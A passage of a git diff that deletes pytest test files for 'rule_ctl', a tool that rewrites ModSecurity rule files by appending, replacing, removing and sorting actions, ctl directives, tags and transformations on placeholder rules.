@@ -1,16 +0,0 @@
-from rule_ctl import Context
-
-def create_context(arguments, rules_string):
-    context = Context()
-    patched_arguments = arguments
-    if "--config" not in arguments:
-        patched_arguments = arguments + ["--config", "dummy"]
-    context.parse_arguments(args=patched_arguments)
-
-    for rule in context.parse_rules(rules_string):
-        rule.modify(context)
-    return context
-
-
-def get_output(context):
-    return "\n".join(context.generate_output()) + "\n"
diff --git a/util/rule_ctl/tests/rule_ctl_actions_test.py b/util/rule_ctl/tests/rule_ctl_actions_test.py
deleted file mode 100644
index f5657a3bb..000000000
--- a/util/rule_ctl/tests/rule_ctl_actions_test.py
+++ /dev/null
@@ -1,377 +0,0 @@
-from .helpers import *
-
-class TestAppendAction:
-    def test_append_action_with_no_actions(self):
-        arguments = [
-            "--append-action", "msg:foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,msg:foo"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_action_with_existing_actions(self):
-        arguments = [
-            "--append-action", "msg:foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    log:'abc'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    log:'abc',\\
-    msg:foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_action_with_duplicate_action(self):
-        arguments = [
-            "--append-action", "msg:foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:'foo',\\
-    log:'abc'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert rule_string == get_output(context)
-
-    def test_append_action_in_correct_order(self):
-        arguments = [
-            "--append-action", "msg:foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    noauditlog,\\
-    logdata:'data'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    noauditlog,\\
-    msg:foo,\\
-    logdata:'data'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_action_with_chain(self):
-        arguments = [
-            "--append-action", "msg:foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    noauditlog,\\
-    logdata:'data',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    noauditlog,\\
-    msg:foo,\\
-    logdata:'data',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "msg:foo"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_action_skip_chain(self):
-        arguments = [
-            "--append-action", "msg:foo",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    noauditlog,\\
-    logdata:'data',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    noauditlog,\\
-    msg:foo,\\
-    logdata:'data',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestReplaceAction:
-    def test_replace_action_with_no_actions(self):
-        arguments = [
-            "--replace-action", "msg:foo,msg:bar",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_action_with_existing_actions(self):
-        arguments = [
-            "--replace-action", "msg:foo,msg:bar",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:bar,\\
-    log:'abc'"
-"""
-        expected = rule_string
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_action_with_duplicate_action(self):
-        arguments = [
-            "--replace-action", "msg:foo,msg:bar",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:'foo',\\
-    msg:'abc'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:bar,\\
-    msg:'abc'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_action_with_different_name(self):
-        arguments = [
-            "--replace-action", "msg:foo,deny",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:'foo',\\
-    msg:'abc'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    msg:'abc'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-        arguments = [
-            "--replace-action", "deny,msg:foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    msg:'abc'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:foo,\\
-    msg:'abc'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_replace_action_without_values(self):
-        arguments = [
-            "--replace-action", "pass,deny",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    pass,\\
-    msg:'abc'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    msg:'abc'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_replace_action_with_for_any_value(self):
-        arguments = [
-            "--replace-action", "msg,msg:bar",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    msg:something,\\
-    msg:'or',\\
-    msg:other"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    msg:bar,\\
-    msg:bar,\\
-    msg:bar"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_replace_action_with_quotes(self):
-        arguments = [
-            "--replace-action", "msg,msg:'bar'",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    msg:something,\\
-    msg:'or',\\
-    msg:other"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    msg:'bar',\\
-    msg:'bar',\\
-    msg:'bar'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_replace_action_with_chain(self):
-        arguments = [
-            "--replace-action", "msg:foo,msg:bar",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:'foo',\\
-    msg:'abc',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "msg:'foo'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:bar,\\
-    msg:'abc',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "msg:bar"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_replace_action_skip_chain(self):
-        arguments = [
-            "--replace-action", "msg:foo,msg:bar",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:'foo',\\
-    msg:'abc',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "msg:'foo'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    msg:bar,\\
-    msg:'abc',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "msg:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
diff --git a/util/rule_ctl/tests/rule_ctl_ctl_test.py b/util/rule_ctl/tests/rule_ctl_ctl_test.py
deleted file mode 100644
index efcf90526..000000000
--- a/util/rule_ctl/tests/rule_ctl_ctl_test.py
+++ /dev/null
@@ -1,125 +0,0 @@
-from .helpers import *
-
-class TestAppendControl:
-    def test_append_ctl_with_no_ctls(self):
-        arguments = [
-            "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_ctl_with_existing_ctls(self):
-        arguments = [
-            "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    ctl:ruleRemoveTargetById=1234;ARGS:username"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    ctl:ruleRemoveTargetById=1234;ARGS:username,\\
-    ctl:ruleRemoveTargetById=1234;ARGS:passwd"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_ctl_with_duplicate_ctl(self):
-        arguments = [
-            "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\
-    log:'abc'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert rule_string == get_output(context)
-
-    def test_append_ctl_in_correct_order(self):
-        arguments = [
-            "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    sanitiseMatchedBytes,\\
-    ver:3"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    sanitiseMatchedBytes,\\
-    ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\
-    ver:3"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_ctl_ignores_ctl_prefix(self):
-        arguments = [
-            "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_ctl_with_chain(self):
-        arguments = [
-            "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain"
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" "ctl:ruleRemoveTargetById=1234;ARGS:passwd"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_ctl_skip_chain(self):
-        arguments = [
-            "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain"
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
diff --git a/util/rule_ctl/tests/rule_ctl_tags_test.py b/util/rule_ctl/tests/rule_ctl_tags_test.py
deleted file mode 100644
index a65e66ef9..000000000
--- a/util/rule_ctl/tests/rule_ctl_tags_test.py
+++ /dev/null
@@ -1,395 +0,0 @@
-from .helpers import *
-
-class TestAppendTag:
-    def test_append_tag_with_no_tags(self):
-        arguments = [
-            "--append-tag", "foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_tag_with_existing_tags(self):
-        arguments = [
-            "--append-tag", "foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    tag:'abc'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    tag:'abc',\\
-    tag:'foo'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_tag_with_duplicate_tag(self):
-        arguments = [
-            "--append-tag", "foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    tag:'foo',\\
-    tag:'abc'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert rule_string == get_output(context)
-
-    def test_append_tag_in_correct_order(self):
-        arguments = [
-            "--append-tag", "foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    log:'log',\\
-    logdata:'data',\\
-    sanitiseArg:arg"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    log:'log',\\
-    logdata:'data',\\
-    tag:'foo',\\
-    sanitiseArg:arg"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_tag_with_chain(self):
-        arguments = [
-            "--append-tag", "foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    log:'log',\\
-    logdata:'data',\\
-    sanitiseArg:arg,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "deny"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    log:'log',\\
-    logdata:'data',\\
-    tag:'foo',\\
-    sanitiseArg:arg,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "deny,\\
-        tag:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_append_tag_skip_chain(self):
-        arguments = [
-            "--append-tag", "foo",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    log:'log',\\
-    logdata:'data',\\
-    sanitiseArg:arg,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "deny"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    deny,\\
-    log:'log',\\
-    logdata:'data',\\
-    tag:'foo',\\
-    sanitiseArg:arg,\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar \\
-        "@rx bar" \\
-        "deny"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestRemoveTag:
-    def test_remove_tag_with_no_tags(self):
-        arguments = [
-            "--remove-tag", "foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_remove_tag_with_existing_tags(self):
-        arguments = [
-            "--remove-tag", "foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_remove_tag_with_chain(self):
-        arguments = [
-            "--remove-tag", "foo",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain"
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_remove_tag_skip_chain(self):
-        arguments = [
-            "--remove-tag", "foo",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain"
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain"
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestRenameTag:
-    def test_rename_tag_with_no_tags(self):
-        arguments = [
-            "--rename-tag", "foo,bar",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_rename_tag_with_existing_tags(self):
-        arguments = [
-            "--rename-tag", "foo,bar",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'foo',\\
-    tag:'alpha'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'bar',\\
-    tag:'alpha'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_rename_tag_with_chain(self):
-        arguments = [
-            "--rename-tag", "foo,bar",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'foo',\\
-    tag:'alpha',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-        "tag:'foo'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'bar',\\
-    tag:'alpha',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-        "tag:'bar'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_rename_tag_skip_chain(self):
-        arguments = [
-            "--rename-tag", "foo,bar",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'foo',\\
-    tag:'alpha',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-        "tag:'foo'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'bar',\\
-    tag:'alpha',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-        "tag:'foo'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestSortTags:
-    def test_sort_tags(self):
-        arguments = [
-            "--sort-tags"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'foo',\\
-    tag:'alpha'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'alpha',\\
-    tag:'foo',\\
-    tag:'omega'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_sort_tags_with_chain(self):
-        arguments = [
-            "--sort-tags"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'foo',\\
-    tag:'alpha',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-        "tag:'omega',\\
-        tag:'foo',\\
-        tag:'alpha'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'alpha',\\
-    tag:'foo',\\
-    tag:'omega',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-        "tag:'alpha',\\
-        tag:'foo',\\
-        tag:'omega'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_sort_tags_skip_chain(self):
-        arguments = [
-            "--sort-tags",
-            "--skip-chain"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'omega',\\
-    tag:'foo',\\
-    tag:'alpha',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-        "tag:'omega',\\
-        tag:'foo',\\
-        tag:'alpha'"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-    "id:12,\\
-    tag:'alpha',\\
-    tag:'foo',\\
-    tag:'omega',\\
-    chain"
-
-    SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\
-        "tag:'omega',\\
-        tag:'foo',\\
-        tag:'alpha'"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
diff --git a/util/rule_ctl/tests/rule_ctl_test.py b/util/rule_ctl/tests/rule_ctl_test.py
deleted file mode 100644
index f7114ceaf..000000000
--- a/util/rule_ctl/tests/rule_ctl_test.py
+++ /dev/null
@@ -1,195 +0,0 @@
-from .helpers import *
-
-class TestFilterRuleId:
-    def test_filter_rule_id_exact_match(self):
-        arguments = [
-            "--filter-rule-id", "12",
-            "--append-tag", "foo"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_filter_rule_id_prefix_match(self):
-        arguments = [
-            "--filter-rule-id", "^12",
-            "--append-tag", "foo"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_filter_rule_id_suffix_match(self):
-        arguments = [
-            "--filter-rule-id", ".*22$",
-            "--append-tag", "foo"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_filter_rule_id_no_match(self):
-        arguments = [
-            "--filter-rule-id", "11",
-            "--append-tag", "foo"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = rule_string
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestLineNumbers:
-    def test_line_numbers_identical(self):
-        arguments = [
-            "--append-tag", "foo"
-        ]
-        rule_string = """
-
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-
-SecRule ARGS "@rx bar" "id:13"
-"""
-        expected = """
-
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'"
-
-SecRule ARGS "@rx bar" "id:13,tag:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_line_numbers_shifted_down(self):
-        arguments = [
-            "--append-tag", "foo"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12"
-
-SecRule ARGS "@rx bar" \\
-    "id:13"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    tag:'foo'"
-
-SecRule ARGS "@rx bar" \\
-    "id:13,\\
-    tag:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-    def test_line_numbers_shifted_up(self):
-        arguments = [
-            "--remove-tag", "foo"
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    tag:foo"
-
-SecRule ARGS "@rx bar" \\
-    "id:13,\\
-    tag:foo"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12"
-
-SecRule ARGS "@rx bar" \\
-    "id:13"
-"""
-
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-class TestTargetFile:
-    def test_target_file(self, tmp_path):
-        import os
-        from rule_ctl import write_output
-
-        file_path = str(tmp_path / 'foo.conf')
-        arguments = [
-            "--append-tag", "foo",
-            "--target-file", file_path
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12"
-"""
-
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    tag:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        write_output(context)
-
-        assert os.path.exists(file_path)
-        with open(file_path, 'r') as h:
-            assert expected.rstrip() == h.read()
-
-    def test_target_file_uses_config_as_default(self, tmp_path):
-        import os
-        from rule_ctl import write_output
-
-        file_path = str(tmp_path / 'foo.conf')
-        arguments = [
-            "--append-tag", "foo",
-            "--config", file_path
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12"
-"""
-
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar \\
-    "@rx foo" \\
-    "id:12,\\
-    tag:'foo'"
-"""
-
-        context = create_context(arguments, rule_string)
-        write_output(context)
-
-        assert os.path.exists(file_path)
-        with open(file_path, 'r') as h:
-            assert expected.rstrip() == h.read()
diff --git a/util/rule_ctl/tests/rule_ctl_transformations_test.py b/util/rule_ctl/tests/rule_ctl_transformations_test.py
deleted file mode 100644
index f1db898f1..000000000
--- a/util/rule_ctl/tests/rule_ctl_transformations_test.py
+++ /dev/null
@@ -1,281 +0,0 @@
-from .helpers import *
-
-class TestAppendTfunc:
-    def test_append_tfunc_with_no_transformations(self):
-        arguments = [
-            "--append-tfunc", "lower",
-        ]
-        rule_string = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12"
-"""
-        expected = """
-SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,t:lower"
-"""
-        context = create_context(arguments, rule_string)
-        assert expected == get_output(context)
-
-
-    def test_append_tfunc_with_existing_transformations(self):
-        arguments = [
-            "--append-tfunc", "lower",
